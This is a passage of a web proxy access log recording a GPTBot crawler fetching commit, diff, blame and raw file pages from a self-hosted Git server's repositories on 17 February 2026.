11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" +[17/Feb/2026:14:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14402] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 16220] [Gzip 7.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12857] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 19738] [Gzip 7.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" +[17/Feb/2026:14:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 84392] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:14:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 457921] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 458479] [Gzip 15.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:14:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 62489] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 84358] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:14:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 62484] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 9940] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:14:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10167] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:14:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10168] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:14:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10309] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:14:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 69548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:14:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:14:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 48135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:14:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 9453] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:14:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23047] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2frequirements.txt" [Client 74.7.227.38] [Length 19533] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" +[17/Feb/2026:14:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fDOCKER_GUIDE.md" [Client 74.7.227.38] [Length 31297] [Gzip 9.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" +[17/Feb/2026:14:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11933] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" +[17/Feb/2026:14:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 22440] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:14:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 31501] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" +[17/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 24645] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fimages%2ffavicon.ico" [Client 74.7.227.38] [Length 19127] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" +[17/Feb/2026:14:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9822] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:14:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11880] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:14:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11296] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:14:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10518] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 11174] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" +[17/Feb/2026:14:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" +[17/Feb/2026:14:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" +[17/Feb/2026:14:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11206] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" +[17/Feb/2026:14:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/vite.config.ts" +[17/Feb/2026:14:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 288111] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" +[17/Feb/2026:14:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 288849] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" +[17/Feb/2026:14:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 316833] [Gzip 14.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" +[17/Feb/2026:14:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" +[17/Feb/2026:14:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" +[17/Feb/2026:14:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10112] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11208] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" +[17/Feb/2026:14:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10897] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:14:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 